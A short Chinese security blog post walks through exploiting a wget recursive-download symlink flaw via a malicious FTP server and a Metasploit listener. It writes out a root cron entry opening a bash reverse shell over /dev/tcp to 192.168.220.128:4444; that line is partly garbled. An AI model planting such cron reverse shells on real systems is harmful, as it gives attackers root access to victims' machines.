28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。
攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起来看看怎么利用wget漏洞获得交互式的shell吧。
首先我们先建立一个计划任务文件,文件内容是反弹一个交互式的shell到本机。
cat>cronshell <
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '/dev/tcp/ 192.168.220.128/4444;sh &112 2>&112'
EOD
然后,我们利用msf监听本地端口。
搭建一个攻击ftp
下面我用一台centos递归下载ftp上的内容。
可以看到,我们已经获得了session。
小编感觉通过添加计划任务获得shell的方法真的很强(wei)大(suo),你有没有更好的利用方法呢?欢迎发邮件给我们。